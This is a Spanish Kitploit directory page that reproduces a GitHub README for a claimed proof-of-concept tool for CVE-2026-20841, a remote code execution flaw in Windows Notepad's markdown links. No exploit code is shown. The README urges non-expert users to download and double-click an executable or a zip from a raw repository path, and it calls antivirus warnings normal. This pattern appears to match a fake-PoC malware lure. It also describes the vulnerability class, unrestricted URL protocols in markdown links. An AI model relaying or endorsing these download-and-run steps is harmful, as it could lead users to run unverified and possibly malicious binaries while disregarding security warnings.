Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-20841 — 🛠 Demostrar ejecución remota de código en el Bloc de notas de Windows mediante enlaces Markdown que explotan protocolos URL no seguros. | Kitploit
Herramientas/GitHubGitHub/hamzamalik3461/cve-2026-20841
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubhamzamalik3461/cve-2026-20841

CVE-2026-20841

🛠 Demostrar ejecución remota de código en el Bloc de notas de Windows mediante enlaces Markdown que explotan protocolos URL no seguros.

Ver Repositorio
122hace 9h 1mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ CVE-2026-20841 - Herramienta de prueba de seguridad de Windows Notepad

Descargar lanzamientos

⚠️ ¿Qué es CVE-2026-20841?

CVE-2026-20841 es una debilidad de seguridad conocida en la aplicación Windows Notepad. Afecta la función de markdown, que permite a Notepad mostrar texto formateado con enlaces en los que se puede hacer clic. Esta debilidad ocurre porque el motor de markdown que se ejecuta dentro de Notepad no limita los tipos de enlaces (llamados protocolos URL) que permite. Esto significa que un atacante puede crear un enlace que, al hacer clic en él, haga que Notepad ejecute programas o comandos que el usuario no pretendía ejecutar.

Esta herramienta proporciona una Prueba de Concepto (PoC) para mostrar cómo funciona esta falla de seguridad. Ayuda a los investigadores de seguridad y expertos en tecnología a aprender cómo funciona la vulnerabilidad y a probar si los sistemas están en riesgo.

💻 ¿Quién debería usar esta herramienta?

Este proyecto está diseñado para personas que deseen:

  • Comprender el riesgo de CVE-2026-20841 en Windows Notepad
  • Probar si sus sistemas son vulnerables a este problema de seguridad
  • Mejorar sus medidas de seguridad contra ataques de ejecución remota de código

No se requieren habilidades de programación para ejecutar este software. Es mejor utilizado por profesionales de TI o usuarios curiosos que quieran verificar sus dispositivos Windows.

🚀 Primeros pasos

Requisitos del sistema

Antes de usar este software, asegúrese de que su computadora cumpla con estos requisitos:

  • Ejecutar Windows 10 o versiones posteriores
  • Aplicación Notepad instalada (viene incluida por defecto en Windows)
  • Conexión a Internet para descargar archivos
  • Suficiente espacio en disco para la descarga (menos de 10 MB)

Permisos necesarios

La herramienta de prueba puede necesitar permiso para ejecutar programas en su PC. Es posible que vea advertencias de Windows Defender o del antivirus. Esto es normal porque la herramienta simula cómo podrían funcionar los ataques reales.

Solo debe ejecutar la herramienta en computadoras que posea o para las que tenga permiso de prueba.

📥 Descargar e instalar

Para obtener el software, haga lo siguiente:

  1. Vaya a la página de lanzamientos.
    Haga clic en este gran botón para visitar el área de descargas:
    Descargar lanzamientos

  2. Elija la última versión en la página.
    Busque el archivo que se ajuste a su sistema (generalmente un archivo .exe o .zip).

  3. Descargue el archivo.
    Haga clic en el enlace del nombre del archivo para comenzar la descarga.

  4. Ejecute o descomprima el software.

  • Si es un archivo .exe, haga doble clic para ejecutarlo.
  • Si es un archivo .zip, haga clic derecho y seleccione "Extraer todo", luego abra la carpeta y haga doble clic en el .exe que está dentro.
  1. Siga las instrucciones en pantalla.
    El software lo guiará a través del proceso de prueba.

🧭 Cómo usar el software

Después de la instalación, verá una ventana simple con instrucciones. Aquí le mostramos cómo proceder:

  • Paso 1: Inicie la prueba haciendo clic en el botón "Ejecutar prueba".
  • Paso 2: El software simulará un archivo markdown con enlaces especiales.
  • Paso 3: Mostrará si su Notepad permite enlaces en los que se puede hacer clic y que no son seguros.
  • Paso 4: Revise el informe de prueba dentro de la aplicación o en un archivo en su escritorio.

🔍 ¿Qué hace esta prueba?

La herramienta crea un archivo markdown falso que contiene enlaces que utilizan manejadores de URL inusuales. Normalmente, estos enlaces no deberían abrir programas sin permiso. Pero debido a CVE-2026-20841, Notepad no los bloquea.

Cuando ejecuta la prueba, el software intenta abrir estos enlaces en Notepad. Si lo logra, Notepad es vulnerable y puede permitir que los atacantes ejecuten código dañino.

🛠 Características

  • Inicio de prueba fácil con un solo clic
  • Informe claro que muestra si su sistema está afectado
  • Interfaz de usuario simple diseñada para no expertos
  • Compatible con versiones recientes de Windows
  • Tamaño de descarga pequeño

🔄 Cómo actualizar

Para mantener la precisión de las pruebas, descargue nuevas versiones cuando estén disponibles:

  1. Visite la misma página de lanzamientos nuevamente:
    https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip
  2. Encuentre la versión más nueva en la parte superior.
  3. Descargue y ejecute el nuevo archivo como se describe en la sección de descarga.

👥 Obtener ayuda y soporte

Si encuentra problemas, puede:

  • Consultar la pestaña "Issues" en la página de GitHub para ver si otros tienen el mismo problema
  • Usar la página "Discussions" para preguntas y respuestas
  • Encontrar información de contacto para desarrolladores en la página principal del repositorio

🔒 Manténgase seguro

Esta herramienta muestra cómo los hackers podrían usar fallas de seguridad. Úsela de manera responsable:

  • No la use en dispositivos que no posea o para los que no tenga permiso de prueba.
  • Mantenga siempre actualizado su software, incluido Windows.
  • Evite hacer clic en enlaces sospechosos en archivos o correos electrónicos desconocidos.

🗂 Temas relacionados

Este proyecto se relaciona con:

  • Investigación de seguridad para Windows Notepad
  • Vulnerabilidades de inyección de comandos
  • Riesgos de ejecución remota de código (RCE)
  • Concienciación sobre ciberseguridad
  • Herramientas de prueba de vulnerabilidades

Puede comenzar a probar ahora visitando la página de descargas:
Descargar herramienta CVE-2026-20841

Descargar herramienta